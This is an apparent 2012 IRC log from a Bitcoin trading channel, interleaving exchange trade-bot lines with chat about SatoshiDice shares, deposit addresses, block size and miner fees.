0.4099 = 2.4594 BTC [-] Aug 26 00:08:38 But for large deposits. Otherwise, again, not worth the hassle :D Aug 26 00:08:53 [GLBSE] [GIGAMINING] 1 @ 0.9799 BTC [+] Aug 26 00:10:27 [GLBSE] [RSM] 3 @ 0.299 = 0.897 BTC [-] Aug 26 00:10:33 [GLBSE] [FPGA.CONTRACT] 4 @ 0.15398 = 0.6159 BTC [+] Aug 26 00:20:20 [MPEX] [O.BTCUSD.P080N] 3 @ 0.09423653 = 0.2827 BTC [-] Aug 26 00:22:25 GIPPT dividend has gone out :) Aug 26 00:22:49 thanks DT, and hello Aug 26 00:23:17 No problems :) Aug 26 00:24:06 [GLBSE] [TYGRR.BOND-A] 3 @ 0.1 = 0.3 BTC [+] Aug 26 00:25:17 ciuciu: very doubtfull that the one addy is used for all deposits Aug 26 00:25:57 ciuciu: then also consider that margin would be included in the daily average Aug 26 00:26:11 ;;view Aug 26 00:26:12 #9826 Sat Aug 25 13:45:41 2012 smickles BUY 244.0 mpexbtc @ 244 mpexbtc (I have a deposit in the works, but would like to make an order now, so I'm looking for someone to float me some mpexbtc) Aug 26 00:27:10 ciuciu: would you seriously doubt an explanation would come when the question asked? Aug 26 00:28:29 what sort of verification do you expect? Aug 26 00:28:52 the reason there would be other deposit addys is to keep deposits from public knowledge Aug 26 00:29:33 as in, i don't want it publicly know that i'm sending 5k btc to mpex, so give me a nonstandard deposit address Aug 26 00:29:55 if mircea_popescu betrayed one of thos addresses, it would spoil the idea Aug 26 00:30:28 ciuciu: no, but in this case, how can you verify the information? Aug 26 00:32:08 and the satoshi client does not allow you to easily control a sendfrom address, so checking withdrawals probably wouldn't work Aug 26 00:33:15 ciuciu: afaik, verification of information only works when it's possible to verify Aug 26 00:35:51 [MPEX] [S.MPOE] 20600 @ 0.00037531 = 7.7314 BTC [-] Aug 26 00:38:38 it's kinda silly to ask for verification and not know how that information can be verified Aug 26 00:39:51 Please, don't start a new witch hunt Aug 26 00:39:58 [GLBSE] [NASTY] 1 @ 0.56 BTC [-] Aug 26 00:40:06 rdponticelli: prolly already started Aug 26 00:40:15 a whole new round of bullshit Aug 26 00:40:17 It's getting tiresome Aug 26 00:40:27 [GLBSE] [YABMC] 4 @ 0.12818 = 0.5127 BTC [+] Aug 26 00:40:41 What's new? Aug 26 00:40:44 What bullshit? Aug 26 00:40:52 only because you think he and the pr chick are the same person Aug 26 00:41:21 JohnSmith777: ciuciu accusing mircea_popescu of lying again Aug 26 00:41:48 if not you, then nobody Aug 26 00:42:04 myself and a couple otheres were discussing things Aug 26 00:42:30 Nothing but witch hunts on the forums latrly :S Aug 26 00:42:45 yeah, seems so Aug 26 00:43:46 most of the top threads are of that ilk Aug 26 00:43:59 [GLBSE] [FPGAMINING] 4 @ 0.8616 = 3.4464 BTC [+] Aug 26 00:44:00 [GLBSE] [FPGAMINING] 2 @ 0.8615 = 1.723 BTC [-] Aug 26 00:44:01 [GLBSE] [FPGAMINING] 2 @ 0.861 = 1.722 BTC [-] Aug 26 00:44:13 [GLBSE] [GSDPT] 2 @ 0.0034 = 0.0068 BTC [+] Aug 26 00:45:41 if you look at the spends on the public address, you'll see that it's mixed up with other addresses that have received way more Aug 26 00:45:52 so there's verifiable proof that it's not only 9k Aug 26 00:46:53 Too late... Aug 26 00:47:22 fuck, what did I start now? :P Aug 26 00:47:39 [GLBSE] [GSDPT] 3000 @ 0.0034 = 10.2 BTC [+] Aug 26 00:47:42 not necesarily Aug 26 00:47:47 [GLBSE] [OBSI.HRPT] 3 @ 0.10699999 = 0.321 BTC [+] Aug 26 00:48:01 bitfoo: it could be that he sends withdrawals from another wallet Aug 26 00:48:09 an online wallet Aug 26 00:48:36 yea Aug 26 00:48:38 for example, look at this tx: http://blockchain.info/tx-index/17077706/39d523221b9841e5a9dfde6daa29d774048422f8f25663a9e5a19a8e7fdc5975 Aug 26 00:48:45 the first address is the public one Aug 26 00:48:56 but it mixes funds from others which have received 20K btc Aug 26 00:49:06 like the 1JP Aug 26 00:49:43 [GLBSE] [HYDRO.BONDS] 5 @ 1.6 = 8 BTC [-] Aug 26 00:50:14 bitfoo: however, since at least one tx is that way, ... Aug 26 00:51:15 so there we go, it would seem no need to even ask now Aug 26 00:51:16 [GLBSE] [GOLD] 5 @ 0.00989 = 0.0495 BTC [-] Aug 26 00:51:40 yeah, I'm reasonably convinced there are private deposit addresses Aug 26 00:52:08 [GLBSE] [ASICMINER] 9 @ 0.0898 = 0.8082 BTC [-] Aug 26 00:52:26 [GLBSE] [BBBB] 1 @ 0.00399 BTC [+] Aug 26 00:53:32 Okay, what are some worthwhile investments on the GLBSE? Aug 26 00:54:13 pirate bonds! Aug 26 00:54:18 Aug 26 00:54:21 Because this just in a big penny stock bubble: https://glbse.com/asset/view/GMVT-BOT Aug 26 00:54:29 If you have some sell when you can. Aug 26 00:54:44 has the bot been doing well? Aug 26 00:54:57 It had a decent dividend but it won't be consistent Aug 26 00:55:02 unless we see more flash crashes Aug 26 00:55:05 there's not much sell depth to it anyway Aug 26 00:55:34 I bought at 1.0 and sold at 1.5 for a nice profit Aug 26 00:55:50 but not much volume I'm guessing Aug 26 00:56:23 well, JohnSmith777 i'd like to make sure you are aware of the things i'm involved in Aug 26 00:56:27 ss and mpoe.etf Aug 26 00:56:40 which reminds me Aug 26 00:56:44 does ss have pirate exposure? Aug 26 00:56:48 [GLBSE] [FPGAMINING] 1 @ 0.8599 BTC [-] Aug 26 00:56:52 yes, some Aug 26 00:56:55 smickles: I'll take a look : ) Aug 26 00:56:56 ok Aug 26 00:57:10 !ticker gigamining Aug 26 00:57:12 so if he runs, ss's insurances will kick in Aug 26 00:57:23 [GLBSE:GIGAMINING] [Bid: 0.84] [Ask: 0.9799] [Spread: 0.1399] [Last: 0.9799] [24hVol: 322.58211666] [7dAvg: 0.98714979] Aug 26 00:58:00 I have 1 whole share of ss Aug 26 00:58:01 still? Aug 26 00:58:05 bitfoo: still Aug 26 00:58:08 wait, you guys contradict each other Aug 26 00:58:12 :D Aug 26 00:58:21 all - 1 Aug 26 00:58:27 bitfoo: I have like 230 shares out of 750 Aug 26 00:58:37 oh, so all = 230/750 :P Aug 26 00:58:38 lol Aug 26 00:58:41 :P Aug 26 00:58:43 915 iirc Aug 26 00:58:50 ah Aug 26 00:59:04 I believe in Erik so I am going invest in some Satoshi Dice Aug 26 00:59:07 bitfoo: I'm the guy with the 200@2.8 on there haha Aug 26 00:59:25 yeah, I remember some meme about that Aug 26 00:59:32 yep lol Aug 26 00:59:36 30 of them he won't sell for any price Aug 26 00:59:42 I bought the entire second issuance Aug 26 00:59:46 and most of the first Aug 26 01:00:02 SS = best asset Aug 26 01:00:14 speaking of which, I have dividends just sitting in GLBSE Aug 26 01:00:22 once this pirate thing settles, imsaguy and i will get the NAV of SS bact to where that 2.8 will fill Aug 26 01:00:33 haha Aug 26 01:00:40 [GLBSE] [PUREMINING] 3 @ 0.09978999 = 0.2994 BTC [+] Aug 26 01:00:53 smickles: then you need to do another issuance at 2.5 :p Aug 26 01:01:09 so I can continue this funny buy at 1, sell at 2.5, buy at 2, sell at 2.8 loop Aug 26 01:01:15 no, we're prolly going to issue a bond, rather than more shares in ss Aug 26 01:01:25 ah :p Aug 26 01:01:34 [GLBSE] [GSDPT] 1600 @ 0.0034 = 5.44 BTC [+] Aug 26 01:03:09 [GLBSE] [GSDPT] 50 @ 0.0034 = 0.17 BTC [+] Aug 26 01:07:24 [GLBSE] [NASTY] 2 @ 0.56 = 1.12 BTC [-] Aug 26 01:09:20 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Aug 26 01:09:37 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Aug 26 01:10:43 People are underestimating Satoshi Dice and it just took a massive plunge. Aug 26 01:11:00 Thus I buy with an expectation to sell higher. Aug 26 01:11:48 JohnSmith777: well, that's because the glbse thing is just a passthru Aug 26 01:11:54 it had liquidity issues Aug 26 01:12:14 [MPEX] [F.GIGA.ETF] 846 @ 0.00102152 = 0.8642 BTC [-] Aug 26 01:12:15 on mpex, it's still (and always has been) selling for .0032 Aug 26 01:12:15 [MPEX] [F.GIGA.ETF] 8300 @ 0.00102165 = 8.4797 BTC [+] Aug 26 01:12:16 [MPEX] [F.GIGA.ETF] 4391 @ 0.00102409 = 4.4968 BTC [+] Aug 26 01:12:35 today 5 million more shares will be issued at .0034 Aug 26 01:12:46 and tomorrow, 3 million more at .0036] Aug 26 01:13:19 Ick Aug 26 01:13:27 [GLBSE] [TYGRR.BOND-A] 134 @ 0.1 = 13.4 BTC [+] Aug 26 01:13:38 That's a lot of shares on the market. Aug 26 01:13:40 and only a very small amout has sold for over .0032 Aug 26 01:14:00 [MPEX] [S.MPOE] 11400 @ 0.00037637 = 4.2906 BTC [+] Aug 26 01:14:01 [MPEX] [S.MPOE] 1300 @ 0.00037951 = 0.4934 BTC [+] Aug 26 01:14:07 It's indeed a pass through :) Aug 26 01:14:19 I issue and sell more shares as the once I have put up sells out. Aug 26 01:14:31 I want to make sure I keep the backing on a good level Aug 26 01:14:34 Why the hell are millions of shartes being created when each one is worth less than a penny Aug 26 01:14:47 Welcome to the world of Penny Stocks Aug 26 01:14:51 Whats with the sub-bitcent ipos, seriously Aug 26 01:15:02 It' Aug 26 01:15:07 that'w how MPex works share value is in Satoshi :P Aug 26 01:15:07 Most starting companies IPO that way. Aug 26 01:15:09 It's actually kind of annoying Aug 26 01:15:21 It doesn't matter how it internally represents the share price Aug 26 01:15:42 I think Evoorhees thinking is that it will help liquidity. Aug 26 01:15:51 i dunno, something about how mircea likes it Aug 26 01:16:01 He's full-on Austrian so it makes sense. Aug 26 01:16:15 I don't see the connection Aug 26 01:16:18 and if bitcoin 'takes off' a > 1 btc share would be outrageous Aug 26 01:16:24 Yeah, that too Aug 26 01:16:30 He may have high hopes for Bitcoin Aug 26 01:16:31 like berkshire Aug 26 01:17:13 [GLBSE] [ASICMINER] 1 @ 0.0898 BTC [-] Aug 26 01:17:15 Additionally Aug 26 01:17:21 IF there is price fluctuation Aug 26 01:17:27 The price only goes up a few points Aug 26 01:17:35 It doesn't swing wildly Aug 26 01:17:53 lol Aug 26 01:18:01 If somebody wanted a stable bitcoin price Aug 26 01:18:10 They would just have to sell it at a lower decimal point Aug 26 01:20:16 [GLBSE] [FPGAMINING] 5 @ 0.8599 = 4.2995 BTC [-] Aug 26 01:20:17 [GLBSE] [FPGAMINING] 45 @ 0.86 = 38.7 BTC [+] Aug 26 01:32:42 [GLBSE] [ASICMINER] 11 @ 0.0898 = 0.9878 BTC [-] Aug 26 01:33:01 [GLBSE] [ASICMINER] 4 @ 0.0898 = 0.3592 BTC [-] Aug 26 01:35:12 Good night guys, don't let the impostor get you ;) Aug 26 01:35:33 register your nick... Aug 26 01:36:03 I have done it already I am not stupid :P Aug 26 01:36:13 ahah, at last Aug 26 01:36:14 And locked it so you get auto kicked if you don't auth Aug 26 01:36:35 Well goodbye Aug 26 01:36:44 cu Aug 26 01:37:08 Also, if anyone has shares with no volume to sell down into, query me, might be interested to buy them at a discount Aug 26 01:43:13 FYI - to address the comment from before, the number of shares is totally irrelevant, it's just a matter of notation. 1m, 10m, or 100m shares... doesn't matter. All that matters is price per share X total shares. 100m is a nice round number so I chose it. Aug 26 01:43:57 [GLBSE] [TYGRR.BOND-P] 1 @ 0.48 BTC [-] Aug 26 01:43:58 [GLBSE] [TYGRR.BOND-P] 10 @ 0.48999999 = 4.9 BTC [+] Aug 26 01:44:00 [GLBSE] [TYGRR.BOND-P] 4 @ 0.49 = 1.96 BTC [+] Aug 26 01:47:38 [GLBSE] [BITBOND] 6 @ 0.4451 = 2.6706 BTC [+] Aug 26 01:47:52 You value yourself as over 1/70th of all bitcoins that will ever be created... ~340000 - 350000 BTC Aug 26 01:49:01 [MPEX] [F.GIGA.ETF] 6300 @ 0.00102409 = 6.4518 BTC [+] Aug 26 01:49:06 Which is also over 1/30th of the current bitcoins in existence Aug 26 01:49:12 Well SD is currently over 1/2 of all transactions... just sayin Aug 26 01:49:21 Aye, so I hear Aug 26 01:49:51 which is really fuckin blockchain size Aug 26 01:49:59 :( Aug 26 01:50:08 fuckin up* Aug 26 01:50:13 It's just that bitcoins going mainstream would probably kill your ratio Aug 26 01:50:17 if bitcoin can't adapt to handle 100 satoshidice's, it will fail Aug 26 01:50:33 kill the ratio, yes, but not kill the profitability Aug 26 01:50:56 yes it should adapt Aug 26 01:51:03 current situation sucks Aug 26 01:51:41 SD has exposed a weakness of BTC and BTC will get fixed Aug 26 01:52:18 [GLBSE] [BITBOND] 6 @ 0.4099 = 2.4594 BTC [-] Aug 26 01:52:45 Which weakness? Aug 26 01:53:08 that the block sizes are too big, and the data needs trimming Aug 26 01:54:16 [GLBSE] [ASICMINER] 45 @ 0.0898 = 4.041 BTC [-] Aug 26 01:54:26 If data storage and transfer capabilities keep increasing at this rate... Aug 26 01:54:44 [MPEX] [S.MPOE] 200 @ 0.00039052 = 0.0781 BTC [+] Aug 26 01:54:46 [MPEX] [S.MPOE] 13318 @ 0.00039114 = 5.2092 BTC [+] Aug 26 01:54:59 I doubt the extra block sizes would ever matter... but yeah I wouldn't mind trimming of data Aug 26 01:55:06 [GLBSE] [ASICMINER] 4 @ 0.0898 = 0.3592 BTC [-] Aug 26 01:55:43 I agree with you BTC-Mining Aug 26 01:55:51 but lots of people are upset about the traffic from SD Aug 26 01:57:48 [GLBSE] [BIB.PIRATE] 20 @ 0.338 = 6.76 BTC [+] Aug 26 01:58:31 [GLBSE] [FPGAMINING] 4 @ 0.84121 = 3.3648 BTC [-] Aug 26 01:58:32 [GLBSE] [FPGAMINING] 3 @ 0.841 = 2.523 BTC [-] Aug 26 01:58:34 [GLBSE] [FPGAMINING] 1 @ 0.84 BTC [-] Aug 26 02:01:38 [GLBSE] [GSDPT] 67 @ 0.0034 = 0.2278 BTC [+] Aug 26 02:07:17 evoorhees: If the Bitcoin network can't handle Satoshi Dice, it wasn't fit for the future. Aug 26 02:07:20 [MPEX] [S.MPOE] 39840 @ 0.00039105 = 15.5794 BTC [-] Aug 26 02:07:21 People need to get ready Aug 26 02:07:30 agreed Aug 26 02:07:56 it'll get fixed, bitcoin-dev need to get off their asses and work with evoorhees Aug 26 02:08:08 its not his fault Aug 26 02:08:12 so people can stfu Aug 26 02:08:37 I thought the main issue people had was that the whole blockchain took too large and long to download... Aug 26 02:08:42 rg - proud satoshidice user Aug 26 02:08:50 The block size doesn't seem bad currently Aug 26 02:09:08 meh Aug 26 02:09:13 the load time is pretty ridic Aug 26 02:09:33 the blockchain as a concept is cool Aug 26 02:09:38 but its implimentation is not Aug 26 02:09:49 but its better this shit gets worked out now Aug 26 02:09:53 [MPEX] [S.MPOE] 8360 @ 0.00039105 = 3.2692 BTC [-] Aug 26 02:09:55 exactly Aug 26 02:09:57 imagine if bitcoin got really popular Aug 26 02:10:06 and the amount of transactions we have were the normal number Aug 26 02:10:09 PLUS satoshidice Aug 26 02:10:11 SD isn't really an issue now, but it exposes how close we are to running into some issuues Aug 26 02:10:24 evoorhees: i think that in another 6-12 months Aug 26 02:10:26 with no action Aug 26 02:10:26 in any case, these problems are all fixable Aug 26 02:10:29 it'd be a real big issue Aug 26 02:10:39 SD just makes the devs fix it sooner instead of a year or two later Aug 26 02:10:47 im curious what they've got in store to fix the blockchain size Aug 26 02:10:48 and load time Aug 26 02:10:52 it changed priorities Aug 26 02:11:16 the blockchain size doesn't need to change - it's the block size that does Aug 26 02:11:21 because that's what keeps stacking up Aug 26 02:11:44 since most people pay a lot of tx fee for satoshidice Aug 26 02:11:45 and also, people should expect that everyone using BTC will use the desktop client Aug 26 02:11:46 that's silly Aug 26 02:11:50 isnt SD technically better for miners Aug 26 02:11:54 since fees will be incl in the block Aug 26 02:12:00 pushing it over 50 btc Aug 26 02:12:18 [GLBSE] [BITCOINMINV] 3 @ 0.122 = 0.366 BTC [-] Aug 26 02:12:35 yes Aug 26 02:12:36 Luke-Jr: won't process SD transactions Aug 26 02:12:45 lol Aug 26 02:12:48 I don't see any issues with the blockchain size either Aug 26 02:12:54 its big Aug 26 02:13:04 Not that big... Aug 26 02:13:10 asking someone whos new to bitcoin to download a program plus a 2GB block of data Aug 26 02:13:15 BTC-Mining: you haven't started from scratch recently im sure :) Aug 26 02:13:16 to send an unpopular psuedo-currency Aug 26 02:13:18 its kind of a lot to ask.. Aug 26 02:13:27 so far, SD has paid over 550btc in fees Aug 26 02:13:34 just on it's outbound half Aug 26 02:13:39 the players have paid roughly that amount also Aug 26 02:13:40 well Aug 26 02:13:43 dont you mena your users paid it Aug 26 02:13:44 yeah Aug 26 02:13:47 so like 1100btc in four months in fees Aug 26 02:13:55 [GLBSE] [JTME] 4 @ 0.95 = 3.8 BTC [-] Aug 26 02:14:38 i dont think that many pools pay out fees but yeah Aug 26 02:14:54 well Aug 26 02:14:58 not all pools make $1000/day Aug 26 02:15:04 so its better to keep em running Aug 26 02:15:07 2 GB is nothing for modern days... Aug 26 02:15:12 even though pools break the idea of btc Aug 26 02:15:29 Most modern games take more than that on a computer to run Aug 26 02:15:29 BTC-Mining: but it is when you can't download it at full speed Aug 26 02:15:30 [MPEX] [S.MPOE] 8340 @ 0.00038787 = 3.2348 BTC [-] Aug 26 02:15:31 [MPEX] [S.MPOE] 10455 @ 0.00039114 = 4.0894 BTC [+] Aug 26 02:15:37 ah, I suppose Aug 26 02:16:06 yeah Aug 26 02:16:12 when you connect to a bunch of DSLs Aug 26 02:16:14 with 128k upload Aug 26 02:16:15 hehe Aug 26 02:16:22 that's why i always connect to the bitvps node Aug 26 02:16:25 [MPEX] [S.MPOE] 29500 @ 0.00039253 = 11.5796 BTC [+] Aug 26 02:16:26 at least i wont be limited by dl speed Aug 26 02:16:52 we made herbal brownies today! Aug 26 02:17:14 i havent tried one cause itll make me fall aseep Aug 26 02:17:18 but i will Aug 26 02:19:16 [GLBSE] [HYDRO.BONDS] 2 @ 1.6 = 3.2 BTC [-] Aug 26 02:19:32 [GLBSE] [PUREMINING] 3 @ 0.0691 = 0.2073 BTC [-] Aug 26 02:20:09 i make the best brownies Aug 26 02:20:26 we made a ton fo butter too Aug 26 02:20:29 but i told him Aug 26 02:20:33 i was like brostaff we need a cheesecloth Aug 26 02:20:43 otherwise the coffee filters are gonna filter out the other shit Aug 26 02:20:49 i dont know how it came out Aug 26 02:20:51 i havent checked Aug 26 02:21:43 butter is good Aug 26 02:22:42 coffee filters wouldn't filter out the good shit, but i imagine running butter through a coffee filter was insanely slow/didn't work Aug 26 02:23:11 the issue imo is that satoshidice should offer a less direct service Aug 26 02:23:34 usagi: but that is what it has going for it Aug 26 02:23:44 if you mean having accounts and not so many txns Aug 26 02:24:13 Do they really need to have games with maximum bets of 0.05 Aug 26 02:24:21 rg: no, because including SD comes with a huge risk of orphaned blocks, losing both the fees AND the 50 BTC Aug 26 02:24:24 [GLBSE] [BIB.PIRATE] 6 @ 0.4499 = 2.6994 BTC [+] Aug 26 02:24:26 [GLBSE] [BIB.PIRATE] 5 @ 0.45 = 2.25 BTC [+] Aug 26 02:24:35 whys that Aug 26 02:24:52 rg: because Satoshi's code is buggy and not simple to fix for 0.7 Aug 26 02:25:09 big blocks = minutes to propagate the p2p network Aug 26 02:25:27 since every node must download the whole block, then verify every signature in it, before they will even START uploading it to the next node Aug 26 02:25:58 hmm Aug 26 02:25:58 i see Aug 26 02:26:04 evoorhees: we're gonna have to take you out Aug 26 02:26:09 im sorry you had to find out this way Aug 26 02:26:25 luke-jr : rally the bitcoin militia Aug 26 02:26:37 whowhat Aug 26 02:26:54 SD cannot be defeated, it has achieved self-awareness Aug 26 02:26:55 we're going to assasinate evoorhes Aug 26 02:26:58 for the good of bitcoin Aug 26 02:27:06 that's what you were saying, right? Aug 26 02:27:12 that's almost like printing money to help the economy ;) Aug 26 02:27:28 well we gotta assasinate someone Aug 26 02:27:28 who is evoorhees? Aug 26 02:27:35 hes the satoshidice guy Aug 26 02:27:38 THE guy Aug 26 02:27:40 ok, ok Aug 26 02:27:42 let's do it Aug 26 02:27:57 mabye we can get one of your children in on it Aug 26 02:28:00 they gotta learn sometime Aug 26 02:28:05 dammit Aug 26 02:28:29 SatoshiDice is nothing but a DDoS attack on Bitcoin abusing gamblers to finance its attack Aug 26 02:28:43 lol luke Aug 26 02:28:49 no.. Aug 26 02:28:52 satoshidice should work fine Aug 26 02:28:56 and bitcoin doesnt Aug 26 02:29:03 rg: no, Bitcoin is not meant to scale before it's adopted. Aug 26 02:29:17 luke-jr: but dont you see the problem with that Aug 26 02:29:29 and it's not meant for microtransactions in general Aug 26 02:29:34 bitcoin is supposed to get huge and run on an ancient platform? Aug 26 02:29:38 hell no Aug 26 02:29:40 we should fix the problems now Aug 26 02:29:47 while its just a bunch of nerds Aug 26 02:29:48 The free market will solve all the problems. Aug 26 02:29:51 /thread Aug 26 02:29:52 [MPEX] [S.MPOE] 6394 @ 0.00039332 = 2.5149 BTC [+] Aug 26 02:29:54 shut your mouth Aug 26 02:30:05 i dont want to hear any of that free market shit in here. Aug 26 02:30:14 trollface.jpeg Aug 26 02:30:26 lol Aug 26 02:30:32 I agree with rg really, it was gonna get big one day Aug 26 02:30:36 rg: great, I agree that bug needs to be fixed Aug 26 02:30:42 and the blockchain is only gonna get bigger Aug 26 02:30:47 but when you find a bug accidentally, you don't CONTINUE TO EXPLOIT IT Aug 26 02:30:57 hes not exploiting it Aug 26 02:30:59 nothing is wrong.. Aug 26 02:31:00 he is Aug 26 02:31:07 o.O Aug 26 02:31:12 if it continued to run witout intervention, it would cause an issue Aug 26 02:31:19 but right now.. its like global warming Aug 26 02:31:20 its bad Aug 26 02:31:23 but its not killing us yet Aug 26 02:31:33 rg: it's killing pools that accept their transactions Aug 26 02:31:37 maybe some animals and glaciers and shit Aug 26 02:31:41 but fuck them anyway Aug 26 02:31:53 i havent heard any complaints Aug 26 02:32:00 which pools are bitching? Aug 26 02:32:01 save the glaciers Aug 26 02:32:03 then you're not payign attention Aug 26 02:32:10 I shall provide a useful video as usual, http://www.youtube.com/watch?v=p6PZhONZ3Ac :D Aug 26 02:32:12 orphans are up all around Aug 26 02:32:26 so is hash rate Aug 26 02:32:30 and number of miners Aug 26 02:32:30 irrelevant Aug 26 02:32:39 im saying Aug 26 02:32:40 the more hashes Aug 26 02:32:46 the more bad blocks hat are gouing to be found Aug 26 02:32:47 false Aug 26 02:32:53 that are* Aug 26 02:32:56 fucking bluetooth Aug 26 02:32:58 also linked for relevance, http://i.qkme.me/35fzav.jpg Aug 26 02:33:07 [GLBSE] [ASICMINER] 1 @ 0.0898 BTC [-] Aug 26 02:33:13 The irony about global warming is Aug 26 02:33:24 that private companies have reduced their emissions Aug 26 02:33:29 without intervention Aug 26 02:33:57 now I am not here to advocate FREE MARKETS!!!111 and Murray Rothbard Aug 26 02:34:14 but reality shows when something becomes a significant problem for most people Aug 26 02:34:18 it will solve itself Aug 26 02:34:37 through mass extinction Aug 26 02:34:47 If humans are that retarded Aug 26 02:34:51 they deserve to be extinct Aug 26 02:35:11 We might as well throw in the towel if we can't survive without becoming somebody's pet project Aug 26 02:36:58 [GLBSE] [BIB.PIRATE] 2 @ 0.45 = 0.9 BTC [+] Aug 26 02:37:49 evoorhees: if you're really NOT trying to kill Bitcoin, how about hiring a developer to fix this problem? Aug 26 02:38:13 evoorhees: Satoshi's p2p code is all synchronous, so it will mostly need to be significantly refactored to do it.. Aug 26 02:38:44 honestly I don't know enough about coding, or the problems involved, to even know where to start Aug 26 02:38:57 I'm in for a few BTC donation to make the network more robust. Aug 26 02:39:02 well, that's why it'd make sense to hire someone who already develops for Bitcoin Aug 26 02:39:05 Just pay higher fees Aug 26 02:39:08 There you go Aug 26 02:39:21 Luke-Jr - if you have a recommendation, I'd like to hear it Aug 26 02:39:22 JohnSmith777: no, because any miner who accepts the transactions loses all fees plus subsidy Aug 26 02:39:31 can you PM me on the forum and we can discuss? Aug 26 02:39:48 eee look at all the pretty highlights Aug 26 02:39:50 evoorhees: I don't really like the forums. Perhaps ask in #bitcoin-dev ? Aug 26 02:40:09 k, I'll look into it Aug 26 02:40:11 Luke-Jr: and evoorhees are friends now :) Aug 26 02:40:13 going out right now though Aug 26 02:40:22 I'm friends with everyone in bitcoinworld Aug 26 02:40:27 best allies one could ever have Aug 26 02:40:45 you just like them cause they gave you $40k Aug 26 02:40:48 ;P Aug 26 02:41:45 so far.. Aug 26 02:41:56 [GLBSE] [ASICMINER] 56 @ 0.0898 = 5.0288 BTC [-] Aug 26 02:42:28 well not yet Aug 26 02:42:36 but let's count what I've given them as well, shall we ;) Aug 26 02:42:41 money is not given for free Aug 26 02:43:23 Spoken like somebody who knows economics. Aug 26 02:43:54 evoorhees: You guys at BitInstant need to get your site at the top of Google's "Bitcoin" search results. Aug 26 02:44:10 ok so all pending deposits/withdraws flushed. Aug 26 02:44:13 yeah no kidding! Aug 26 02:44:15 we're trying Aug 26 02:44:25 Good to hear. Aug 26 02:44:34 thanks mircea Aug 26 02:44:36 Marketing on Bitcoin is really stagnant right now. Aug 26 02:44:48 Bitcoin.org is really conservative and stuck in geek land. Aug 26 02:44:54 the marketing we're doing is business relationships being built with the normal world Aug 26 02:45:01 it doens't get seen in the forum Aug 26 02:45:05 but very exciting stuff is happening Aug 26 02:45:32 [MPEX] [S.DICE] 76250 @ 0.0032 = 244 BTC [-] Aug 26 02:46:06 !ticker s.dice Aug 26 02:46:07 Phase I almost sold out now Aug 26 02:46:07 [MPEX:S.DICE] 1day: 0.0032 / 0.00320167 / 0.003232 (1966687 shares, 6,296.70 BTC), 30day: 0.0032 / 0.00320167 / 0.003232 (1966687 shares, 6,296.70 BTC) Aug 26 02:46:16 o ya tis wiped huh Aug 26 02:46:48 [MPEX] [S.DICE] 33313 @ 0.0032 = 106.6016 BTC [-] Aug 26 02:47:10 !ticker gsdpt Aug 26 02:47:14 [GLBSE:GSDPT] [Bid: 0.0031] [Ask: 0.0034] [Spread: 0.0003] [Last: 0.0034] [24hVol: 819.333953] [7dAvg: 0.00400594] Aug 26 02:47:27 that 33313 was the last of teh 32's Aug 26 02:47:28 dead been doing some more biz too Aug 26 02:47:28 the quickest way to kill bitcoin is to build bridges to the "real world" Aug 26 02:47:41 ok so lemme read up here. Aug 26 02:47:47 It's amazing how much activity a profitable company gets. Aug 26 02:47:56 usagi: Elaborate? Aug 26 02:47:59 mircea_popescu: you can prolly ignore that bit about the deposits Aug 26 02:48:04 we figured it out Aug 26 02:48:07 Build the wrong bridge and they'll seize your server Aug 26 02:48:24 If it's in the US. Aug 26 02:48:34 rdponticelli not everyone pays to the standard address. some people ask for separate ones, for w/e reason. sometimes there's compensations related to margins that don't even register on the blockchain. etc. Aug 26 02:48:36 It doesn't matter where it is lol Aug 26 02:48:53 usagi I can't explain how strongly I disagree with you :) Aug 26 02:48:54 [GLBSE] [HYDRO.BONDS] 1 @ 1.6 BTC [-] Aug 26 02:49:08 bitfoo the disadvantage is that any generated address you're stuck with forevar. Aug 26 02:49:18 Yes you can, you are making lots of $ so you disagree Aug 26 02:49:38 wow Aug 26 02:49:41 good argument Aug 26 02:49:42 But as soon as you start dealing with real world companies and lawyers you open yourself up to getting screwed in ways you can't imagine now Aug 26 02:50:02 I'm happy to take on that risk, to keep making bitcoin bigger Aug 26 02:50:07 If you get sued you will lose everything Aug 26 02:50:12 I'm happy to do the ground work Aug 26 02:50:20 I believe in Erik so I am going invest in some Satoshi Dice << wise man :D Aug 26 02:50:20 I won't lose my bitcoins will I Aug 26 02:50:36 The very first thing they will do is establish a dollar value for your bitcoins Aug 26 02:50:41 lol Aug 26 02:50:47 Why the hell are millions of shartes being created when each one is worth less than a penny << same reason billions of satoshis are created, neh ? Aug 26 02:50:50 and how many bitcoins do I have? :) Aug 26 02:50:59 Dunno, how much $ is your company worth? Aug 26 02:51:11 [MPEX] [F.GIGA.ETF] 2010 @ 0.00102409 = 2.0584 BTC [+] Aug 26 02:51:11 If you include the value of your bitcoins in it you will have a big problem one day :) Aug 26 02:51:12 [MPEX] [F.GIGA.ETF] 12190 @ 0.00102564 = 12.5026 BTC [+] Aug 26 02:51:29 Bitcoins can't be seized with force. ; ) Aug 26 02:51:35 They can only be given up voluntarily. Aug 26 02:51:39 well... I'm not going to stop moving forward with Bitcoin just because I might have big problems one day Aug 26 02:51:49 revolutions are not won by being timid and careful Aug 26 02:51:57 this is becoming my life's work Aug 26 02:52:00 seize a computer with wallet by force and you can seize bitcoins by force... Aug 26 02:52:01 Neither are they won by making deals with the enemy Aug 26 02:52:11 If you're making inroads with real world companies you will have big issues and soon Aug 26 02:52:11 BTC-Mining: Brainwallet. Aug 26 02:52:18 SatoshiDice is nothing but a DDoS attack on Bitcoin abusing gamblers to finance its attack :D Aug 26 02:52:26 That's an exception but heck Aug 26 02:52:45 usagi - you fundamentally misunderstand the power of Bitcoin Aug 26 02:52:56 you're worried about "normal world" corrupting it? :) Aug 26 02:52:59 For one, how are you going to explain that your company has sold a portion of itself on a virtual stock exchange? If you ever IPO'd for real or made a deal with a real world company those shares would become garbage Aug 26 02:53:05 they should be worried about bitcoinworld "corrupting" theirs Aug 26 02:53:07 which it will Aug 26 02:53:15 the most efficient money system will win Aug 26 02:54:00 Evoorhees will probably only IPO in Bitcoins from here forward. Aug 26 02:54:00 Build the wrong bridge and they'll seize your server << the guy is paranoid with publicity, let me tell you. Aug 26 02:54:08 John gets it Aug 26 02:54:14 had me kaibosh all sorts of otherwise good deals cause "not the right kind of attention" Aug 26 02:54:38 Well maybe I misunderstood what you said about making deals with "real world companies" Aug 26 02:54:48 Cuz once they get their hooks in you, you're finished Aug 26 02:54:54 SD is not making deals with real world companies Aug 26 02:54:59 but 